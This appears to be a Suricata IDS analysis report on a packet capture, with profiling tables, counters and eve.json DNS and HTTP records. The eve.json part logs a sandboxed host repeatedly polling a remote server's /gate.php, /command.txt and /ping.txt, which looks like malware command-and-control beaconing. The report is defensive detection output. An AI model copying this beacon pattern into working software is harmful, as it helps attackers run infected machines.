Filename: pcap (4).pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 26.7647972107 seconds
Hash: 4af40c2c9c43f7fcc993afd736c52ccf
Uploaded: 1568631013

Logfiles

packet_stats.log (16159 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1             5        369573862      608843078     533292336          2.7b    1.01
 IPv4       2            14         18760448      761073476     235017647          3.3b    1.24
 IPv4       6           382          4662594      852498610     538649912        205.8b   77.65
 IPv4      17           174         19705326      779272554     306225051         53.3b   20.11
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1             5           159118         242950        218170          1.1m    0.13
TMM_FLOWWORKER              IPv4       2            14           132932         449214        167735          2.3m    0.27
TMM_FLOWWORKER              IPv4       6           382           116962       17424238       2004075        765.6m   88.10
TMM_FLOWWORKER              IPv4      17           174           204274       10788790        542547         94.4m   10.86
TMM_RECEIVEPCAPFILE         IPv4       1             5             4502           5436          4907         24.5k    0.00
TMM_RECEIVEPCAPFILE         IPv4       2            14             4448           5482          4656         65.2k    0.01
TMM_RECEIVEPCAPFILE         IPv4       6           379             4444           7138          4880          1.8m    0.21
TMM_RECEIVEPCAPFILE         IPv4      17           174             4444           5842          4793        834.1k    0.10
TMM_DECODEPCAPFILE          IPv4       1             5             4618          20396          7926         39.6k    0.00
TMM_DECODEPCAPFILE          IPv4       2            14             4556          14744          5453         76.4k    0.01
TMM_DECODEPCAPFILE          IPv4       6           379             4560          19130          4796          1.8m    0.21
TMM_DECODEPCAPFILE          IPv4      17           174             4574          20482          4911        854.6k    0.10

Flow Worker            IP ver   Proto   cnt            min            max            avg            tot     %
--------------------   ------   -----   ----------     ------------   ------------   -----------    ------  -----
flow                    IPv4       1             5             5548           6232          5895         29.5k  0.00  
flow                    IPv4       6           379             4774          31070          5857          2.2m  0.27  
flow                    IPv4      17           174             4752         419372          9321          1.6m  0.19  
stream                  IPv4       6           382             5116         449880         32596         12.5m  1.49  
app-layer               IPv4      17           174             4416          61920          9242          1.6m  0.19  
detect                  IPv4       1             5           139114         221734        197507        987.5k  0.12  
detect                  IPv4       2            14           123350         439662        157625          2.2m  0.26  
detect                  IPv4       6           382            78192       17363684       1897116        724.7m  86.94 
detect                  IPv4      17           174           176364       10752738        491797         85.6m  10.27 
tcp-prune               IPv4       6           382             4440          32758          5776          2.2m  0.26  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg            tot     %
--------------------   ------   -----   ----------     ------------   ------------   -----------    ------  -----
http                    IPv4       6             6             5120          34420         16562         99.4k  20.68 
http                    IPv4      17             4             7414          44824         30397        121.6k  25.30 
dns                     IPv4      17            28             5964          23400          9271        259.6k  54.02 
Proto detect            IPv4      17            38             4786          38896          8864        336.9k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot     %
------------------------   ------   -----   ----------     ------------   ------------   -----------    ------  -----
LOGGER_ALERT_FAST           IPv4       6             2            70544         196118        133331        266.7k  1.80  
LOGGER_UNIFIED2             IPv4       6             2            86566         166988        126777        253.6k  1.71  
LOGGER_JSON_ALERT           IPv4       6             2           106338         113464        109901        219.8k  1.48  
LOGGER_JSON_DNS             IPv4      17            18            35744         660172        107017          1.9m  12.97 
LOGGER_JSON_HTTP            IPv4       6            79            51786         224208         93244          7.4m  49.61 
LOGGER_JSON_FILE            IPv4       6            52            70788         224180         92588          4.8m  32.43 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1             5            18218          61218         29780       148.9k  0.16  
payload                           IPv4       6           325             4496       17120078         86386        28.1m  30.92 
payload                           IPv4      17           174             5114       10163028         85392        14.9m  16.36 
stream                            IPv4       6           325             4436         684714         44108        14.3m  15.79 
http_uri                          IPv4       6            79            11432         132924         27090         2.1m  2.36  
http_request_line                 IPv4       6            79             5884          16800          6689       528.5k  0.58  
http_client_body                  IPv4       6            79             4680          22902          5202       411.0k  0.45  
http_header (request)             IPv4       6            79            28810         136916         49587         3.9m  4.31  
http_header (request trailer)     IPv4       6            79             4498          26592          5035       397.8k  0.44  
http_header_names (request)       IPv4       6            79             8570         234148         15813         1.2m  1.38  
http_accept (request)             IPv4       6            79             4918          33312          6327       499.9k  0.55  
http_referer (request)            IPv4       6            79             4808           6380          5056       399.5k  0.44  
http_content_len (request)        IPv4       6            79             4866          34680          5695       450.0k  0.50  
http_content_type (request)       IPv4       6            79             4748           6550          5000       395.0k  0.44  
http_protocol (request)           IPv4       6            79             5208          26084          6423       507.5k  0.56  
http_start (request)              IPv4       6            79            10110          43782         14675         1.2m  1.28  
http_raw_header (request)         IPv4       6            79            14496          87468         20213         1.6m  1.76  
http_method                       IPv4       6            79             5628          11988          6561       518.4k  0.57  
http_cookie (request)             IPv4       6            79             4814          29216          5989       473.2k  0.52  
http_raw_uri                      IPv4       6            79             5566          31216          7169       566.4k  0.62  
http_user_agent                   IPv4       6            79            14148          51704         21315         1.7m  1.85  
http_host                         IPv4       6            79             6054          32398          8398       663.5k  0.73  
dns_query                         IPv4      17             9             6130          19092         12826       115.4k  0.13  
http_response_line                IPv4       6            79             5652         126738         10067       795.3k  0.88  
http_header (response)            IPv4       6            79            17798         171262         34245         2.7m  2.98  
http_header (response trailer)    IPv4       6            79             4492          29480          5154       407.2k  0.45  
http_content_type (response)      IPv4       6            79             5892          42622          8468       669.0k  0.74  
http_raw_header (response)        IPv4       6           159             6322          30420         10407         1.7m  1.82  
http_cookie (response)            IPv4       6            79             4888          18402          5472       432.3k  0.48  
http_stat_code                    IPv4       6            79             4890          22380          5681       448.8k  0.49  
file_data (http response)         IPv4       6            80             4470        2881212        107483         8.6m  9.47  
Total                             IPv4                  2973                                         30542        90.8m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot     %
------------------------   ------   -----   ----------     ------------   ------------   -----------    ------  -----
PROF_DETECT_IPONLY          IPv4       1             3            41958          42692         42281        126.8k  0.01  
PROF_DETECT_IPONLY          IPv4       2            14            41270         345312         66980        937.7k  0.08  
PROF_DETECT_IPONLY          IPv4       6             8            23862         137596         69656        557.3k  0.05  
PROF_DETECT_IPONLY          IPv4      17            40             7326         115358         56579          2.3m  0.19  
PROF_DETECT_RULES           IPv4       1             5            14626          51224         32276        161.4k  0.01  
PROF_DETECT_RULES           IPv4       2            14             4424           4792          4468         62.6k  0.01  
PROF_DETECT_RULES           IPv4       6           382             4436       16257890       1529727        584.4m  48.76 
PROF_DETECT_RULES           IPv4      17           174            76290       10616746        265137         46.1m  3.85  
PROF_DETECT_STATEFUL_START    IPv4       6           278             8922       14104352       1055242        293.4m  24.48 
PROF_DETECT_STATEFUL_CONT    IPv4       1             5             4658           4860          4713         23.6k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       2            14             4400           4692          4500         63.0k  0.01  
PROF_DETECT_STATEFUL_CONT    IPv4       6           382             4442         305790         13559          5.2m  0.43  
PROF_DETECT_STATEFUL_CONT    IPv4      17           174             4400          69712          5811          1.0m  0.08  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           366             4454          27074          5017          1.8m  0.15  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            18             4590          30416          6355        114.4k  0.01  
PROF_DETECT_PREFILTER       IPv4       1             5            46000         116580         70334        351.7k  0.03  
PROF_DETECT_PREFILTER       IPv4       2            14            13560          22586         15212        213.0k  0.02  
PROF_DETECT_PREFILTER       IPv4       6           382            13620       17200908        282092        107.8m  8.99  
PROF_DETECT_PREFILTER       IPv4      17           174            41426       10209078        132277         23.0m  1.92  
PROF_DETECT_PF_PAYLOAD      IPv4       1             5            27374          70384         38925        194.6k  0.02  
PROF_DETECT_PF_PAYLOAD      IPv4       6           325            34428       17140938        144879         47.1m  3.93  
PROF_DETECT_PF_PAYLOAD      IPv4      17           174            14252       10175152         95157         16.6m  1.38  
PROF_DETECT_PF_TX           IPv4       6           366             4462        2901762        126881         46.4m  3.88  
PROF_DETECT_PF_TX           IPv4      17             9            15304          28824         22462        202.2k  0.02  
PROF_DETECT_PF_SORT1        IPv4       1             3             4684           5318          4908         14.7k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6           318             4544          42758          9270          2.9m  0.25  
PROF_DETECT_PF_SORT1        IPv4      17           174             4496          21046          5721        995.6k  0.08  
PROF_DETECT_PF_SORT2        IPv4       1             5             4744          22488          8382         41.9k  0.00  
PROF_DETECT_PF_SORT2        IPv4       2            14             4418           5362          4562         63.9k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6           382             4426          87422          6418          2.5m  0.20  
PROF_DETECT_PF_SORT2        IPv4      17           174             4456          24638          5512        959.1k  0.08  
PROF_DETECT_NONMPMLIST      IPv4       1             5             4702           4932          4756         23.8k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       2            14             4438           4994          4633         64.9k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6           382             4430          30590          5225          2.0m  0.17  
PROF_DETECT_NONMPMLIST      IPv4      17           174             4422          25480          5190        903.2k  0.08  
PROF_DETECT_ALERT           IPv4       1             5             4456           4648          4545         22.7k  0.00  
PROF_DETECT_ALERT           IPv4       2            14             4420           4520          4456         62.4k  0.01  
PROF_DETECT_ALERT           IPv4       6           382             4422          33298          5142          2.0m  0.16  
PROF_DETECT_ALERT           IPv4      17           174             4426          29348          5037        876.5k  0.07  
PROF_DETECT_CLEANUP         IPv4       1             5             4516           4596          4568         22.8k  0.00  
PROF_DETECT_CLEANUP         IPv4       2            14             4426           6104          4577         64.1k  0.01  
PROF_DETECT_CLEANUP         IPv4       6           382             4496          26994          5319          2.0m  0.17  
PROF_DETECT_CLEANUP         IPv4      17           174             4414         419876          7319          1.3m  0.11  
PROF_DETECT_GETSGH          IPv4       1             5             4842          20842          8058         40.3k  0.00  
PROF_DETECT_GETSGH          IPv4       2            14             4672           4944          4761         66.7k  0.01  
PROF_DETECT_GETSGH          IPv4       6           382             4416          27590          5287          2.0m  0.17  
PROF_DETECT_GETSGH          IPv4      17           174             4430         127208          8241          1.4m  0.12  


stats.log (3295 bytes)
------------------------------------------------------------------------------------
Date: 9/16/2019 -- 10:50:40 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 600
decoder.bytes                              | Total                     | 191276
decoder.ipv4                               | Total                     | 572
decoder.ethernet                           | Total                     | 600
decoder.tcp                                | Total                     | 379
decoder.udp                                | Total                     | 174
decoder.icmpv4                             | Total                     | 5
decoder.avg_pkt_size                       | Total                     | 318
decoder.max_pkt_size                       | Total                     | 1153
flow.tcp                                   | Total                     | 4
flow.udp                                   | Total                     | 31
tcp.sessions                               | Total                     | 4
tcp.syn                                    | Total                     | 4
tcp.synack                                 | Total                     | 4
tcp.rst                                    | Total                     | 1
tcp.overlap                                | Total                     | 2
detect.alert                               | Total                     | 2
detect.mpm_list                            | Total                     | 25
detect.nonmpm_list                         | Total                     | 2
detect.fnonmpm_list                        | Total                     | 1
detect.match_list                          | Total                     | 25
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 79
app_layer.flow.dns_udp                     | Total                     | 9
app_layer.tx.dns_udp                       | Total                     | 9
app_layer.flow.failed_udp                  | Total                     | 22
flow_mgr.new_pruned                        | Total                     | 17
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 34
flow_mgr.flows_notimeout                   | Total                     | 17
flow_mgr.flows_timeout                     | Total                     | 17
flow_mgr.flows_removed                     | Total                     | 17
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65502
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7084384


eve.json (88917 bytes)
{"timestamp":"2019-09-11T14:44:20.377608+0000","flow_id":667706491978504,"pcap_cnt":105,"event_type":"dns","src_ip":"192.168.56.101","src_port":60992,"dest_ip":"192.168.56.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26119,"rrname":"x0x22a3720.temp.swtest.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.377425+0000","flow_id":246005128086097,"pcap_cnt":108,"event_type":"dns","src_ip":"192.168.56.101","src_port":60992,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26119,"rrname":"x0x22a3720.temp.swtest.ru","rrtype":"A","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.476340+0000","flow_id":246005128086097,"pcap_cnt":109,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.101","dest_port":60992,"proto":"UDP","dns":{"type":"answer","id":26119,"rcode":"NOERROR","rrname":"x0x22a3720.temp.swtest.ru","rrtype":"A","ttl":599,"rdata":"77.222.62.31"}}
{"timestamp":"2019-09-11T14:44:21.812215+0000","flow_id":531158744261815,"pcap_cnt":116,"event_type":"dns","src_ip":"192.168.56.101","src_port":60082,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49433,"rrname":"8.8.8.8.in-addr.arpa","rrtype":"PTR","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.818624+0000","flow_id":1133130623057344,"pcap_cnt":117,"event_type":"dns","src_ip":"192.168.56.101","src_port":58854,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10911,"rrname":"31.62.222.77.in-addr.arpa","rrtype":"PTR","tx_id":0}}
{"timestamp":"2019-09-11T14:44:21.845972+0000","flow_id":2154753018919982,"pcap_cnt":118,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=860866723.862194","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:21.872732+0000","flow_id":531158744261815,"pcap_cnt":119,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.101","dest_port":60082,"proto":"UDP","dns":{"type":"answer","id":49433,"rcode":"NOERROR","rrname":"8.8.8.8.in-addr.arpa","rrtype":"PTR","ttl":20947,"rdata":"dns.google"}}
{"timestamp":"2019-09-11T14:44:21.918864+0000","flow_id":1133130623057344,"pcap_cnt":122,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.56.101","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":10911,"rcode":"NOERROR","rrname":"31.62.222.77.in-addr.arpa","rrtype":"PTR","ttl":599,"rdata":"vh274.sweb.ru"}}
{"timestamp":"2019-09-11T14:44:22.518558+0000","flow_id":2154753018919982,"pcap_cnt":127,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=593589424.899796","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:22.577072+0000","flow_id":2154753018919982,"pcap_cnt":129,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=593589424.899796","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":1}}
{"timestamp":"2019-09-11T14:44:22.829979+0000","flow_id":2154753018919982,"pcap_cnt":132,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=58812440.2064312","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:24.016978+0000","flow_id":2154753018919982,"pcap_cnt":134,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=58812440.2064312","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":2}}
{"timestamp":"2019-09-11T14:44:24.221235+0000","flow_id":2154753018919982,"pcap_cnt":135,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=471050500.456599","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:24.533912+0000","flow_id":2154753018919982,"pcap_cnt":138,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=469443738.521653","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:24.624200+0000","flow_id":2154753018919982,"pcap_cnt":140,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=469443738.521653","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":4}}
{"timestamp":"2019-09-11T14:44:24.830725+0000","flow_id":2154753018919982,"pcap_cnt":141,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=852758285.972451","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:25.992173+0000","flow_id":2154753018919982,"pcap_cnt":143,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=852758285.972451","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":5}}
{"timestamp":"2019-09-11T14:44:26.206374+0000","flow_id":2154753018919982,"pcap_cnt":144,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=324320375.946381","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:26.533606+0000","flow_id":2154753018919982,"pcap_cnt":147,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=238399982.975593","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:26.690824+0000","flow_id":2154753018919982,"pcap_cnt":149,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=238399982.975593","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":7}}
{"timestamp":"2019-09-11T14:44:26.892962+0000","flow_id":2154753018919982,"pcap_cnt":150,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=592764555.03687","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:28.017356+0000","flow_id":2154753018919982,"pcap_cnt":152,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=592764555.03687","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":8}}
{"timestamp":"2019-09-11T14:44:28.220770+0000","flow_id":2154753018919982,"pcap_cnt":153,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=259498715.6222","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:28.564917+0000","flow_id":2154753018919982,"pcap_cnt":156,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=729007541.675316","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:28.742387+0000","flow_id":2154753018919982,"pcap_cnt":158,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=729007541.675316","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/command.txt","gaps":false,"state":"CLOSED","stored":false,"size":4,"tx_id":10}}
{"timestamp":"2019-09-11T14:44:28.955471+0000","flow_id":2154753018919982,"pcap_cnt":159,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=652970073.99542","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:30.108751+0000","flow_id":2154753018919982,"pcap_cnt":161,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=652970073.99542","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":11}}
{"timestamp":"2019-09-11T14:44:30.314775+0000","flow_id":2154753018919982,"pcap_cnt":162,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=971429763.310168","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
